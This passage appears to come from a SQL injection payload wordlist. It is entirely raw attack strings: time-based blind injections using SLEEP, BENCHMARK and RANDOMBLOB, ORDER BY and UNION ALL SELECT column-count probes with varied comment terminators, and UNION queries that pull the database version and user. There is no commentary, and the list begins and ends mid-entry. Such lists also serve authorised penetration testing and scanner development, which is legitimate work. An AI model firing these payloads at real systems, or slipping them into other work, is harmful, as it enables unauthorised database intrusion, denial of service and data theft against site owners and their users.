(SELECT(SLEEP(5)))ecMj) +(SELECT * FROM (SELECT(SLEEP(5)))ecMj)# +(SELECT * FROM (SELECT(SLEEP(5)))ecMj)-- ++benchmark(3200,SHA1(1))+' ++ SLEEP(10) + ' +RANDOMBLOB(500000000/2) +AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) +OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) +RANDOMBLOB(1000000000/2) +AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) +OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) +SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/ +ORDER BY SLEEP(5) + ORDER BY 1,SLEEP(5) + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')) + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 + ORDER BY SLEEP(5)# + ORDER BY 1,SLEEP(5)# + ORDER BY 1,SLEEP(5),3# + ORDER BY 1,SLEEP(5),3,4# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30# + ORDER BY SLEEP(5)-- + ORDER BY 1,SLEEP(5)-- + ORDER BY 1,SLEEP(5),3-- + ORDER BY 1,SLEEP(5),3,4-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- + ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- + UNION ALL SELECT 1 + UNION ALL SELECT 1,2 + UNION ALL SELECT 1,2,3 + UNION ALL SELECT 1,2,3,4 + UNION ALL SELECT 1,2,3,4,5 + UNION ALL SELECT 1,2,3,4,5,6 + UNION ALL SELECT 1,2,3,4,5,6,7 + UNION ALL SELECT 1,2,3,4,5,6,7,8 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 + UNION ALL SELECT 1# + UNION ALL SELECT 1,2# + UNION ALL SELECT 1,2,3# + UNION ALL SELECT 1,2,3,4# + UNION ALL SELECT 1,2,3,4,5# + UNION ALL SELECT 1,2,3,4,5,6# + UNION ALL SELECT 1,2,3,4,5,6,7# + UNION ALL SELECT 1,2,3,4,5,6,7,8# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30# + UNION ALL SELECT 1-- + UNION ALL SELECT 1,2-- + UNION ALL SELECT 1,2,3-- + UNION ALL SELECT 1,2,3,4-- + UNION ALL SELECT 1,2,3,4,5-- + UNION ALL SELECT 1,2,3,4,5,6-- + UNION ALL SELECT 1,2,3,4,5,6,7-- + UNION ALL SELECT 1,2,3,4,5,6,7,8-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- + UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- + UNION SELECT @@VERSION,SLEEP(5),3 + UNION SELECT @@VERSION,SLEEP(5),USER(),4 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 + UNION SELECT @@VERSION,SLEEP(5),"'3 + UNION SELECT @@VERSION,SLEEP(5),"'3'"# + UNION SELECT @@VERSION,SLEEP(5),USER(),4# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# + UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30# + UNION ALL SELECT USER()-- + UNION ALL SELECT SLEEP(5)-- + UNION ALL SELECT USER(),SLEEP(5)-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5)-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL 